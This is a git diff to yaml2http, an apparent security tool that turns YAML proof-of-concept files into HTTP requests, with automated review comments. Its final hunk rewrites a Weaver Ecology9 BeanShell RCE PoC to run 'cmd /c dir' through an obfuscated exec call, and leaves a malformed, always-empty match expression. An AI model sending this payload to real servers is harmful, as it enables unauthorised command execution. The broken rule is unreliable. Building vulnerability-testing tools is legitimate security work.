diff --git a/README.md b/README.md
index 6a3b64b..8bbcbd2 100644
--- a/README.md
+++ b/README.md
@@ -28,6 +28,17 @@ Content-Length: 87
 bsh.script=print%2842503*40455%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
 ```
+帮助信息
+
+```bash
+java -jar yaml2http-1.0.jar -h
+usage: yaml2http
+ -b,--bytes Path to file need to be convert, convert the file
+ content as bytes value with b"" format.
+ -h,--help Help info.
+ -p,--path Path to poc file.
+```
+
 ### Burp Suite Extension
 支持在`Burp Suite`中以插件形式进行使用,这种方式可以避免不可打印字符的问题。
@@ -44,6 +55,23 @@ bsh.script=print%2842503*40455%29&bsh.servlet.captureOutErr=true&bsh.servlet.out
 ![](images/20220823113627.png)
+## Build
+
+克隆源码到本地
+
+```bash
+git clone https://github.com/trganda/yaml2http
+```
+
+并执行
+
+```bash
+cd yaml2http
+mvn clean compile assembly:single
+```
+
+之后可在`target`目录下查看编译后的`jar`包文件
+
 ## Todo
 * [X] 完成`yaml`解析,读取已支持字段值
diff --git a/src/main/java/com/github/trganda/App.java b/src/main/java/com/github/trganda/App.java
index b46013f..c9950a8 100644
--- a/src/main/java/com/github/trganda/App.java
+++ b/src/main/java/com/github/trganda/App.java
@@ -16,8 +16,9 @@ public class App {
 public static void main(String[] args) throws IOException, ParseException {
 Options options = new Options();
+options.addOption("h", "help", false, "Help info.");
 options.addOption("p", "path", true, "Path to poc file.");
-options.addOption("b", "bytes", true, "Path ot file need convert.");
+options.addOption("b", "bytes", true, "Path to file need to be convert, convert the file content as bytes value with b\"\" format.");
 CommandLineParser parser = new DefaultParser();
 CommandLine cmd = parser.parse(options, args);
@@ -40,6 +41,9 @@ public static void main(String[] args) throws IOException, ParseException {
 is.read(buf);
 System.out.println(Util.toBytesValue(buf));
+ } else {
+ HelpFormatter formatter = new HelpFormatter();
+ formatter.printHelp("yaml2http", options);
 }
 }
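Review bot: The `-h/--help` option registered in the first App.java hunk is never tested in the second; usage is only printed by the trailing `else`, so `-h` given alongside `-p` or `-b` is presumably ignored, and a malformed command line still leaves `main` as an uncaught `ParseException` stack trace rather than the usage text. Checking the flag first, `if (cmd.hasOption("h")) { new HelpFormatter().printHelp("yaml2http", options); return; }`, and catching `ParseException` around `parser.parse` to print the same usage would cover both cases. The second hunk also uses `HelpFormatter` without adding an import; unless `org.apache.commons.cli.HelpFormatter` (or a package wildcard) is already imported above the first hunk, this will not compile. The `if` chain that the new `else` closes starts outside the hunk.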
diff --git a/src/main/java/com/github/trganda/parser/PocsParser.java b/src/main/java/com/github/trganda/parser/PocsParser.java
index 928b057..ed40ce2 100644
--- a/src/main/java/com/github/trganda/parser/PocsParser.java
+++ b/src/main/java/com/github/trganda/parser/PocsParser.java
@@ -1,5 +1,6 @@
 package com.github.trganda.parser;
+import com.fasterxml.jackson.databind.DeserializationFeature;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.fasterxml.jackson.databind.module.SimpleModule;
 import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
@@ -35,6 +36,8 @@ private void init() {
 mapper.registerModule(simpleModule);
 mapper.findAndRegisterModules();
+ // skip unknown field
+ mapper.disable(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES);
 }
 public Pocs readPocs() throws IOException {
diff --git a/yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml b/yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml
index 2b86231..fa8b628 100644
--- a/yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml
+++ b/yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml
@@ -1,17 +1,16 @@
 name: ecology9-beanshell-rce
 transport: http
 set:
- r1: randomInt(40000, 44800)
- r2: randomInt(40000, 44800)
+ r1: b"\x22cmd /c dir\x22"
 rules:
 r0:
 request:
 method: POST
 path: /weaver/bsh.servlet.BshServlet
- body: bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
+ body: bsh.script=ex\u0065c({{r1}});&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
 headers:
 Content-Type: application/x-www-form-urlencoded
- expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+ expression: response.status == 200 && response.body.bcontains(""))
 expression: r0()
 detail:
 author: trganda
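Review bot: Disabling `FAIL_ON_UNKNOWN_PROPERTIES` in `init()` means a misspelled key in a poc yaml (an `expresion:` rule, say) is now dropped silently instead of rejected, so a broken poc file loads as a weaker one with no diagnostic. If the intent is tolerance for fields this parser does not model yet, register a `DeserializationProblemHandler` through `mapper.addHandler(...)` whose `handleUnknownProperty` logs the property name, skips its value and returns `true`, so the skip stays but becomes visible. The added comment should also state the reason rather than restate the call: `// Skip yaml keys this parser does not model, instead of failing the whole poc file.` The body of `init()` starts outside the hunk.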